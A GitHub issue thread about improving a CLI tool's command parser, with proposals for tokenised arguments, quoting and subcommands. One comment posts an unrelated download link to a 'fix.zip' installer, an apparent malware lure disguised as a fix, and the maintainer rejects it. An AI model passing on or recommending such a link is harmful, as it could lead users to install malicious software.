### ISSUE TITLE
Improve CLI command parser 

### ISSUE THREAD

**Issue by lneely** [lneely/pcloudcc-lneely#60]
Command parser is extremely basic.

`<command> <argument>`

The `<command>` is determined by its string length, and everything else that follows is a "mega-argument," represented as a string. This makes it difficult to pass multiple arguments to a single command, or even to setup shorthand command aliases.

Better to implement a solution that parses the tokens from the command line input, treating [0] as the command, and everything else that follows as an argument. Note that some arguments may have whitespaces, and the user will need to be able to quote or escape the whitespaces so that the entire string is considered a single arg.

**Comment by lneely** [comment]
It might also be neat / better UX or whatever to have subcommands, e.g., `sync add`, `sync rm`, `sync ls`.

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by lneely** [comment]
@WSA1k I am not clicking on any obscured hyperlinks. Send unobscured links, or don't send them. Better yet, send a pull request.
